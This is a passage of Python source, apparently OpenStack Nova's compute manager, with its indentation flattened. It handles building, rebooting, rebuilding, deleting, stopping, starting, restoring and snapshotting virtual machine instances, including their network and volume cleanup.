node=None, limits=None):
try:
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
try:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
retry['exc'] = traceback.format_exception(*sys.exc_info())
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
if self.driver.deallocate_networks_on_reschedule(instance):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
# NOTE(alex_xu): Network already allocated and we don't
# want to deallocate them before rescheduling. But we need
# cleanup those network resource setup on this host before
# rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
instance.task_state = task_states.SCHEDULING
instance.save()
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping)
return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
except Exception as e:
# Should not reach here.
msg = _LE('Unexpected build failure, not rescheduling build.')
LOG.exception(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties):
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
try:
rt = self._get_resource_tracker(node)
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
with self._build_resources(context, instance,
requested_networks, security_groups, image,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
self.driver.spawn(context, instance, image,
injected_files, admin_password,
network_info=network_info,
block_device_info=block_device_info)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning(_LW('No more network or fixed IP to be allocated'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException) as e:
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable) as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image, block_device_mapping):
resources = {}
network_info = None
try:
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
# Because this allocation is async any failures are likely to occur
# when the driver accesses network_info during spawn().
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image,
block_device_mapping)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception() as ctxt:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.UnexpectedTaskStateError as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception(_LE('Failure prepping block device'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
# if network_info is empty we're likely here because of
# network allocation failure. Since nothing can be reused on
# rescheduling it's better to deallocate network to eliminate
# the chance of orphaned ports in neutron
deallocate_networks = False if network_info else True
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception:
ctxt.reraise = False
msg = _('Could not clean up failed build,'
' not rescheduling')
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=msg)
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
msg = _LE('Failed to deallocate networks')
LOG.exception(msg, instance=instance)
return
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
@object_compat
@messaging.expected_exceptions(exception.BuildAbortException,
exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException,
exception.RescheduledException)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def run_instance(self, context, instance, request_spec,
filter_properties, requested_networks,
injected_files, admin_password,
is_first_time, node, legacy_bdm_in_spec):
# NOTE(alaski) This method should be deprecated when the scheduler and
# compute rpc interfaces are bumped to 4.x, and slated for removal in
# 5.x as it is no longer used.
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_run_instance():
self._run_instance(context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec)
do_run_instance()
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to deallocate network for instance.'),
instance=instance)
self._set_instance_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param:context: security context
:param:instance: a nova.objects.Instance object
:param:bdms: the block devices for the instance to be torn
down
:param:requested_networks: the networks on which the instance
has ports
:param:notify: true if a final usage notification should be
emitted
:param:try_deallocate_networks: false if we should avoid
trying to teardown networking
"""
context = context.elevated()
LOG.info(_LI('%(action_str)s instance') %
{'action_str': 'Terminating'},
context=context, instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
network_info = compute_utils.get_nw_info_for_instance(instance)
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
try:
self.driver.destroy(context, instance, network_info,
block_device_info)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
for bdm in vol_bdms:
try:
# NOTE(vish): actual driver detach done in driver.destroy, so
# just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning(_LW('Ignoring EndpointNotFound: %s'), exc,
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
def _cleanup_volumes(self, context, instance_uuid, bdms, raise_exc=True):
exc_info = None
for bdm in bdms:
LOG.debug("terminating bdm %s", bdm,
instance_uuid=instance_uuid)
if bdm.volume_id and bdm.delete_on_termination:
try:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning(_LW('Failed to delete volume: %(volume_id)s '
'due to %(exc)s'),
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms, quotas):
"""Delete an instance on this host. Commit or rollback quotas
as necessary.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
:param quotas: nova.objects.quotas.Quotas object
"""
was_soft_deleted = instance.vm_state == vm_states.SOFT_DELETED
if was_soft_deleted:
# Instances in SOFT_DELETED vm_state have already had quotas
# decremented.
try:
quotas.rollback()
except Exception:
pass
try:
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
instance.info_cache.delete()
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
self._cleanup_volumes(context, instance.uuid, bdms,
raise_exc=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
self._update_resource_tracker(context, instance)
system_meta = instance.system_metadata
instance.destroy()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms, reservations):
"""Terminate an instance on this host."""
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this when we bump the RPC major version to 4.0
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
try:
self._delete_instance(context, instance, bdms, quotas)
except exception.InstanceNotFound:
LOG.info(_LI("Instance disappeared during terminate"),
instance=instance)
except Exception:
# As we're trying to delete always go to Error if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
self._set_instance_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown=True):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
dict(vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
current_power_state=current_power_state),
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info(_LI('Instance is already powered off in the '
'hypervisor when stop is called.'),
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
do_stop_instance()
def _power_on(self, context, instance):
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_LW("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
except Exception:
LOG.exception(_LE("Something wrong happened when trying to "
"delete snapshot from shelved instance."),
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def soft_delete_instance(self, context, instance, reservations):
"""Soft delete an instance on this host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._notify_about_instance_usage(context, instance,
"soft_delete.start")
try:
self.driver.soft_delete(instance)
except NotImplementedError:
# Fallback to just powering off the instance if the
# hypervisor doesn't implement the soft_delete method
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
quotas.commit()
self._notify_about_instance_usage(context, instance, "soft_delete.end")
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
try:
self.driver.restore(instance)
except NotImplementedError:
# Fallback to just powering on the instance if the hypervisor
# doesn't implement the restore method
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, bdms,
detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
detach_block_devices(context, bdms)
if not recreate:
self.driver.destroy(context, instance, network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, network_info=network_info,
block_device_info=new_block_device_info)
@object_compat
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
"""
context = context.elevated()
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this on the next major RPC version bump
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = None
orig_vm_state = instance.vm_state
with self._error_out_instance_on_exception(context, instance):
LOG.info(_LI("Rebuilding instance"), context=context,
instance=instance)
if recreate:
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
# To cover case when admin expects that instance files are on
# shared storage, but not accessible and vice versa
if on_shared_storage != self.driver.instance_on_disk(instance):
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info(_LI('disk on shared storage, recreating using'
' existing disk'))
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info(_LI("disk not on shared storage, rebuilding from:"
" '%s'"), str(image_ref))
# NOTE(mriedem): On a recreate (evacuate), we need to update
# the instance's host and node properties to reflect it's
# destination node for the recreate.
node_name = None
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'),
self.host)
finally:
instance.host = self.host
instance.node = node_name
instance.save()
if image_ref:
image_meta = self.image_api.get(context, image_ref)
else:
image_meta = {}
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
# TODO(jaypipes): Move generate_image_url() into the nova.image.api
orig_image_ref_url = glance.generate_image_url(orig_image_ref)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
# Needed for nova-network, does nothing for neutron
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host)
network_info = compute_utils.get_nw_info_for_instance(instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
self._detach_volume(context, bdm.volume_id, instance,
destroy_bdm=False)
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
if orig_vm_state == vm_states.STOPPED:
LOG.info(_LI("bringing vm to original state: '%s'"),
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info(_LI("Detaching from volume api: %s"), volume_id)
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = (task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED)
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = (task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING_HARD,
task_states.REBOOT_STARTED_HARD)
context = context.elevated()
LOG.info(_LI("Rebooting instance"), context=context, instance=instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
context=context, instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning(_LW('Reboot failed but instance is running'),
context=context, instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
ctxt.reraise = False
else:
LOG.error(_LE('Cannot reboot instance: %s'), error,
context=context, instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning(_LW("Instance disappeared during reboot"),
context=context, instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance, rotation):
if rotation < 0:
raise exception.RotationRequiredForBackup()
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance, rotation)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param image_id: glance.db.sqlalchemy.models.Image.Id
"""
# NOTE(dave-mcnally) the task state will already be set by the api
# but if the compute manager has crashed/been restarted prior to the
# request getting here the task state may have been cleared so we set
# it again and things continue normally
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# possibility instance no longer exists, no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info(_LI('instance snapshotting'), context=context,
instance=instance)
